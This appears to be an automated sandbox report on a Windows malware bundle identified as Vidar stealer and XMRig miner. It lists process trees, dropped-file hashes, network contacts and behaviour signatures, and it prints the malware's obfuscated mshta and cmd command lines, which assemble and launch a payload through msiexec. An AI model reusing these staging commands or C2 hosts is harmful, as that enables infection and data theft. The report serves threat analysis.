"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct ( "wSCRIPT.SHEll" ). RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W " , 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81 &CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eChO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"

C:\Windows\SysWOW64\msiexec.exe

msiexec /y ..\_enU.W

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 464

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 sayanu.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:49275 tcp
N/A 127.0.0.1:49277 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 niemannbest.me udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.75:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 1b16fe969e31beab26afc7060fba271b
SHA1 97f350235d63a11eb5bf555d1d63f8667d47fb31
SHA256 c8345b213f585dffbfc2ec8374dee34b9760c4ce5ddc02414cb90de95dd85e7e
SHA512 90e72cb53e6e983ea3a02aabbb7547873162bdcd47316126c1c7c57efa1104cb6f1f4a0bf5e418a345aba088f23a6d1a02454fb5e50c5222ecfc53fda1ace882

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe

MD5 3fce5aacf6f9eb4b34126d0c2a9d36c2
SHA1 5590c4402fcda16fe873f857088b4ee6c38858b1
SHA256 ba64bfa019840bf787c93b9f25b6fcce479be24c43a285258174a1a70b9bbf12
SHA512 ed8b38dc4af79c7271412a44ecdcb7e2df0525f314cc52b700ee2e93612c99ccad78a48b657ba5178595d133ad03ed842f4db71165a933fcba0b540f48db58d7

memory/2896-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2896-66-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2896-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2896-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2896-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2896-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2896-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2896-83-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe

MD5 3bf8a169c55f8b54700880baee9099d7
SHA1 d411f875744aa2cfba6d239bad723cbff4cf771a
SHA256 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2
SHA512 f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/1832-134-0x00000000008C0000-0x00000000008C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

memory/2948-111-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

memory/1072-143-0x00000000009B0000-0x0000000000A20000-memory.dmp

memory/2652-140-0x0000000000A00000-0x0000000000A16000-memory.dmp

memory/2816-139-0x0000000001300000-0x0000000001372000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PJTNEGBYNN4IUXD59UYU.temp

MD5 aeb0ebed9ca31f56d1b50221cf5c08e0
SHA1 561ed7f32a0e2bf401ec81f6ba3e7a2c0ea0dbab
SHA256 dfc707852c87f4bb93e9e9594f581517cc1f97b8ffd46191b4af279fd407cdcc
SHA512 ffa93eff2207b6af479ef1d9fda297dd4f64f3aa97a726e8dcd9c746123af3611995feb4657d7edd789dd99a2cf752e7be5b6a0bb2a6aaf250e6bceb82bcbcff

memory/2408-138-0x0000000000E30000-0x0000000000EA0000-memory.dmp

memory/1648-152-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2948-154-0x0000000000400000-0x0000000000414000-memory.dmp

memory/592-151-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE

MD5 d165e339ef0c057e20eb61347d06d396
SHA1 cb508e60292616b22f2d7a5ab8f763e4c89cf448
SHA256 ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8
SHA512 da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0988d1c2bd9a37.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe

MD5 e90750ecf7d4add59391926ccfc15f51
SHA1 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1
SHA256 b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59
SHA512 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9

C:\Users\Admin\AppData\Local\Temp\is-TR5KG.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-TR5KG.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe

MD5 6b4f4e37bc557393a93d254fe4626bf3
SHA1 b9950d0223789ae109b43308fcaf93cd35923edb
SHA256 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d
SHA512 a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e

memory/2896-82-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2896-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2896-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2896-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2652-169-0x0000000000340000-0x0000000000346000-memory.dmp

memory/648-184-0x0000000001E90000-0x0000000001FED000-memory.dmp

memory/2896-193-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2896-192-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/648-194-0x0000000002A80000-0x0000000002B26000-memory.dmp

memory/2896-191-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2896-189-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2896-186-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2896-185-0x0000000000400000-0x000000000051C000-memory.dmp

memory/648-196-0x0000000002B30000-0x0000000002BC3000-memory.dmp

memory/648-195-0x0000000002B30000-0x0000000002BC3000-memory.dmp

memory/648-198-0x0000000002B30000-0x0000000002BC3000-memory.dmp

memory/2540-211-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2540-209-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1828-235-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1828-234-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1828-233-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1828-231-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1828-229-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1828-227-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1828-237-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2696-224-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2696-222-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2696-221-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2696-220-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2696-218-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2696-216-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2696-214-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2540-208-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2540-207-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2540-205-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2540-203-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2540-201-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2540-199-0x0000000000400000-0x0000000000422000-memory.dmp

memory/900-238-0x0000000000400000-0x0000000002DAA000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240708-en

Max time kernel

148s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"

Signatures

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Vidar Stealer

stealer

XMRig Miner payload

miner

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1984 set thread context of 2656 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cxl-game.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Jonba.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f78be40.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\inst2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Jonba.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2740 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
PID 2740 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
PID 2740 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
PID 2740 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
PID 2740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
PID 2740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
PID 2740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
PID 2740 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
PID 2740 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\inst2.exe
PID 2740 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\inst2.exe
PID 2740 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\inst2.exe
PID 2740 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\inst2.exe
PID 2740 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\4.exe
PID 2740 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\4.exe
PID 2740 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\4.exe
PID 2740 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\4.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
